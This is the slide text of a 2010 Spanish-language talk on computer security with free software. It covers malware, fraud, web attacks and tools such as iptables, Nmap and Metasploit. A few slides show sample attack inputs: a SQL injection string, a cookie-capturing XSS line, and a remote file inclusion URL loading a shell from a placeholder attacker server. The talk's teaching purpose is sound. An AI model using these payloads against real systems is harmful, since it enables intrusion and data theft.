Seguridad informatica Con Software Libre

1,406 views
1,236 views

Published on

Ponencia "Seguridad informatica con software libre" para la "Flisol Arequipa 2010" por Juan Alfredo Salas Santillana".

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,406
On SlideShare
0
From Embeds
0
Number of Embeds
48
Actions
Shares
0
Downloads
102
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Seguridad informatica Con Software Libre

  1. 1. Seguridad Informatica con Software Libre <ul>Juan Alfredo Salas Santillana </ul>
  2. 2. AGENDA <ul><li>¿Seguridad Informatica?
  3. 3. Nivel Usuario
  4. 4. - Tipos de Amenazas - Algunos Numeros
  5. 5. - Medidas Basicas a Tomar
  6. 6. Nivel Administrador, Desarrollador – Servidores
  7. 7. - Tipos de Ataques - Factores Fisicos y Otros
  8. 8. - Medidas Basicas a Tomar - Como Ocultarte
  9. 9. Algunas Demostraciones
  10. 10. Ethical Hacking
  11. 11. Recomendaciones </li></ul>
  12. 12. ¿Seguridad Informatica? <ul>Integridad Confidencialidad Disponibilidad No Repudio </ul>
  13. 13. Tipos de Amenazas <ul><li>Malware
  14. 14. Fraudes </li></ul>
  15. 15. Amenazas: Malware <ul><li>Virus
  16. 16. Keyloggers
  17. 17. Troyanos
  18. 18. Gusanos
  19. 19. Spyware
  20. 20. Rootkits </li></ul>
  21. 21. Malware: Virus <ul>Destruccion Replicación mediante usuario </ul>
  22. 22. Malware: Keyloggers <ul>Capturan: -Pulsación de Teclas -Clicks del Mouse </ul>
  23. 23. Malware: Troyanos <ul>Era un Metodo de Infección Procesos Ocultos Administración Remota Se Juntan con Aplicaciones Utiles </ul>
  24. 24. Malware: Gusanos <ul>Autoreplicacion Autopropagación Aprobechan bugs </ul>
  25. 25. Malware: Spyware <ul>Recolectan: Cache, Contraseñas Usualmente son barras </ul>
  26. 26. Malware: Rootkits <ul>- Consiguen: Privilegios - Permiten Correr Programas como Root (Administrador) </ul>
  27. 27. Amenaza: Fraude <ul><li>Phishing
  28. 28. Phraming
  29. 29. Skimming
  30. 30. Ingenieria Social Como Tal </li></ul>
  31. 31. Fraude: Phishing <ul>Pesca Victimas Robar Información Por: Email (SPAM) </ul>
  32. 32. Fraude: Pharming <ul>Envia a una Pagina falsa Modifica: ”Hosts” ”Cache de DNS” </ul>
  33. 33. Fraude: Skimming <ul>Clonación de Tarjetas Mediante Cajeros </ul>
  34. 34. Fraude: Ingenieria Social <ul>Usar la Palabra para convencer Principios: A Todo nos Gusta que nos Alagen No nos Gusta Decir ”NO” Siempre un Gesto de Confianza </ul>
  35. 35. Medidas Basicas <ul><li>Antivirus
  36. 36. Firewall
  37. 37. Filtro AntiSpam </li></ul>
  38. 38. Medidas Basicas: Antivirus CLAMAV - Plataforma: Windows - Licencia: GPL - Monitoreo Permanente - Actualizaciones Frecuentes - No Consume Mucha Memoria Dr. Web (Livecd) - Plataforma: GNU / Linux - Licencia: GPL - Modo: Booteo - Analiza fuera de Windows
  39. 39. Medidas Basicas: Firewall <ul>Aislamiento Registro de Uso Reglas de Transmision </ul>
  40. 40. Algunos Numeros <ul>Virus Indetectable: $100 - $300 Cuenta de Correo Robado: $10 - $100 Tarjeta de Credito Robada: $1000 </ul>
  41. 41. Tipos de Ataques <ul>DOS Mediante Web Explotación de bugs </ul>
  42. 42. Ataques: DOS <ul>Tratan de Colapsar un Servicio Algunos Abren Gran Cantidad de sockets Algunos Realizados Desde una ”Netbot” </ul>
  43. 43. Ataques: Mediante Web <ul>Inyeccion SQL Filtrado Incorrecto de Variables Ejemplo: '' OR '1'='1' </ul><ul>XSS Filtrado Incorrecto de Etiquetas No Afecta en si al Servidor, Solo al Usuario Ejemplo: $cookie = $_GET['cookie']; </ul>
  44. 44. Ataques: Mediante Web <ul>CSRF Explota la Confianza de la Aplicacion a un Usuario </ul><ul>RFI Explotable por la mala programacion de ”Include()” Ejemplo: http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt&&cmd=ls </ul>
  45. 45. Ataques: Explotacion de Bugs <ul>Usan Vulnerabilidades conocidas Se corre un script Puede ser Relizado por un Aprendiz </ul>
  46. 46. Medidas Basicas <ul><li>Firewall
  47. 47. Test de Penetración
  48. 48. Filtrado de Variables </li></ul>
  49. 49. Medidas Basicas: Firewall <ul>IPTABLES Incluido en el Kernel Linux Registro de Logs </ul><ul>FIRESTARTER Licencia: GPL Facil manejo y configuración </ul>
  50. 50. Medidas Basicas: Test de Pentración <ul>NMAP Escaner de puertos, SO y mas. Licencia: GPL </ul><ul>METASPLOIT F. Framework que permite explotar vulnerabilidades. </ul><ul>NESSUS Escaner de vulnerabilidades </ul>
  51. 51. Medidas Basicas: Filtrado de Variables
  52. 52. Factores Fisicos y Otros <ul>Incendios Inundaciones Robo Fisico Defectos y Daños de Hardware </ul>
  53. 53. Como Ocultarte <ul>Tor </ul>
  54. 54. Algunas Demostraciones
  55. 55. Ethical Hacking <ul>Pasion Libertad Conciencia Social &quot;Ningún problema debería resolverse 2 veces&quot; </ul>
  56. 56. Recomendaciones <ul>Nada es 100% Seguro Filtrar tu Informacion Encripta tu Informacion Revisa tus Logs Nunca Pienses que Nadie se Tomara el Trabajo de Hacerlo </ul>

×